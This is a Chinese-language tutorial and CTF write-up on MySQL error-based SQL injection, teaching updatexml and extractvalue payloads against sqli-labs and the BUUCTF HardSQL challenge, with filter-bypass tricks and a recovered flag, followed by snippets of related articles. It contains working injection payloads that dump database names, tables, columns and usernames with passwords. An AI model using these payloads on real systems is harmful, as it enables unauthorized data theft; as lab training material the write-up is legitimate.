sql 報錯注入

阿新 • • 發佈：2020-12-27

技術標籤：web安全

sql報錯注入

報錯注入就是利用了資料庫的某些機制，人為地製造錯誤條件，使得查詢結果能夠出現在錯誤資訊中。

xpath語法錯誤（侷限性）

extractvalue負責在xml文件中按照xpath語法查詢節點內容，updatexml則負責修改查詢到的內容:

updatexml

函式原型：updatexml(xml_document,xpath_string,new_value)
正常語法：updatexml(xml_document,xpath_string,new_value)
第一個引數：xml_document是string格式，為xml文件物件的名稱第二個引數：xpath_string是xpath格式的字串

第三個引數：new_value是string格式，替換查詢到的負荷條件的資料作用：改變文件中符合條件的節點的值

第二個引數是要求符合xpath語法的字串，如果不滿足要求，則會報錯，並且將查詢結果放在報錯資訊裡，因此可以利用。

例題：sqli-labs

Less-5?id=1' or updatexml(1,concat(0x7e,database(),0x7e),1)--+       爆庫

1608557238748

Less-5?id=1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+       爆表

1608557368922

Less-5?id=1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+                                        爆列

1608557617454

Less-5?id=1' or updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1)--+                                                      爆資料

1608557862959

PS:updatexml的最大長度是32位的，所以有所侷限，如果長度超過了32位就不會被顯示出來。

總結：

爆資料庫名：'and(select updatexml(1,concat(0x7e,(select database())),0x7e))

爆表名：'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))

爆列名：'and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name="TABLE_NAME")),0x7e))

爆資料：'and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))

extractvalue函式

函式原型：extractvalue(xml_document,Xpath_string)
正常語法：extractvalue(xml_document,Xpath_string);
第一個引數：xml_document是string格式，為xml文件物件的名稱
第二個引數：Xpath_string是xpath格式的字串
作用：從目標xml中返回包含所查詢值的字串

查資料庫名：id='and(select extractvalue(1,concat(0x7e,(select database()))))

爆表名：id='and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))

爆欄位名：id='and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="TABLE_NAME"))))

爆資料：id='and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))

BUUCTF-[極客大挑戰 2019]HardSQL（報錯注入）

1、用bp fuzz後，union|order by|等號|空格|substr等被過濾，空格沒有被過濾，大致有個印象

2、爆當前的資料庫名：
空格繞過：用括號()包起來就行

admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=21

->庫名：geek
3、爆表名：
等號繞過：用like替換

admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=21

->表名：H4rDsq1
4、爆欄位名：

admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=21

->欄位：id,username,password
5、

'or(extractvalue(1,concat('~',(select(password)from(H4rDsq1)))))#

flag{9f09946d-4c83-40f5-982
沒出全
這時候就要想到mysql的一些函式，substr，left，right
注意：substr被過濾了

admin'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=21

結果:XPATH syntax error: ‘_{3-40f5-9828-9593ee5f3f4c}}’

拼接後結果:
flag{9f09946d-4c83-40f5-9828-9593ee5f3f4c}

Web滲透測試|SQL報錯注入

歡迎點選「演算法與程式設計之美」↑關注我們！本文首發於微信公眾號："演算法與程式設計之美"，歡迎關注，及時瞭解更多此係列文章。

sql 報錯注入

技術標籤：web安全 sql報錯注入報錯注入就是利用了資料庫的某些機制，人為地製造錯誤條件，使得查詢結果能夠出現在錯誤資訊中。

sql報錯注入：extractvalue、updatexml報錯原理

sql報錯注入：extractvalue、updatexml報錯原理 Published on 2019-03-07 11:58 in 分類: sql注入 with 老夏家的部落格

[極客大挑戰 2019]HardSQL 1-SQL報錯注入

SQL注入-報錯注入 [極客大挑戰 2019]HardSQL 試題地址：http://94d112f4-9aed-4f3e-b2ff-0c98f30a81b9.node4.buuoj.cn/

SQL報錯注入

報錯注入在沒法用union聯合查詢時用，但前提還是不能過濾一些關鍵的函式。

SQL-報錯注入

updatexml報錯注入 updatexml (XML_document, XPath_string, new_value): 第一個引數：XML_document是String格式，為XML文件物件的名稱，文中為Doc

sql注入（報錯注入）

1、通過floor報錯,注入語句如下: and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);

sql注入報錯注入常用的三種函式

1.floor()函式報錯原因是報錯的原因是因為rand()函式在查詢的時候會執行一次,插入的時候還會執行一次.這就是整個語句報錯的關鍵

sql注入之報錯注入

1.updatexml（）函式 updatexml(xml_target, xpath_expr, new_xml)接受三個引數，此函式將xml標記的給定片段的單個部分xml_target替換為新的new_xml，然後返回更改後的xml。如果xpath寫入錯誤格式，就會報錯，並且返

SQL注入漏洞--報錯注入

報錯注入報錯注入在沒法用union聯合查詢時用，但前提還是不能過濾一些關鍵的函式。

[sql 注入] insert 報錯注入與延時盲注

insert注入的技巧在於如何在一個欄位值內構造閉合。 insert 報錯注入演示案例所用的表：

簡學-SQL注入（報錯注入）

技術標籤：網路安全網路安全mysql 簡學SQL注入 0x09 SQL注入之報錯注入0x09.1 報錯注入的原理0x09.2 報錯注入常見的函式

sql注入之查詢方式及報錯注入

當進行sql注入時，有很多注入會出無回顯的情況，其中不回顯的原因可能是sql語句查詢方式的問題導致的，這個時候我們需要用到相關的報錯或盲注進行後續操作，同時作為手工注入時，提前瞭解或預知器sqkl語句大概寫法也

sql的報錯注入總結

1.資料溢位 2.xpath語法錯誤 3.concat+rand()+group by 主鍵重複報錯 4.幾何函式 1.資料 exp()函式:此函式返回e(自然對數的底)指數X的冪值，select 查詢成功返回0， ~0=1111111111111111

sql注入之報錯注入and boolean注入

1.sql注入之報錯注入正常傳參，返回頁面正常；加入\' 返回頁面報錯，出現\"zhangsan\"\'

SQL注入之updatexml()報錯注入

SQL注入之updatexml()報錯注入 updatexml()函式使用前提在mysql高版本中(大於5.1版本)中添加了對XML文件進行查詢和修改的函式，updatexml(),extracvalue()

sql查詢報錯注入

一、聯合查詢注入：當有.php?id=1,引數值為id (1)看有無報錯？ \' (2)判斷數字型還是字元型注入？

MYSQL updatexml()函式報錯注入解析

首先了解下updatexml()函式 UPDATEXML (XML_document,XPath_string,new_value); 第一個引數：XML_document是String格式，為XML文件物件的名稱，文中為Doc

sqli-報錯注入

目錄報錯注入是什麼適用場景及條件報錯函式及其原理演示報錯注入是什麼利用將錯誤資訊顯示的函式(語句)，把注入的結果通過錯誤資訊回顯回來

解決Navicat匯入資料庫資料結構sql報錯datetime(0)的問題

錯誤發生情況：將資料庫從mysql5.7匯出為sql，在mysql5.5上進行匯入，報sql語句錯誤：datetime(0)…

sql 報錯注入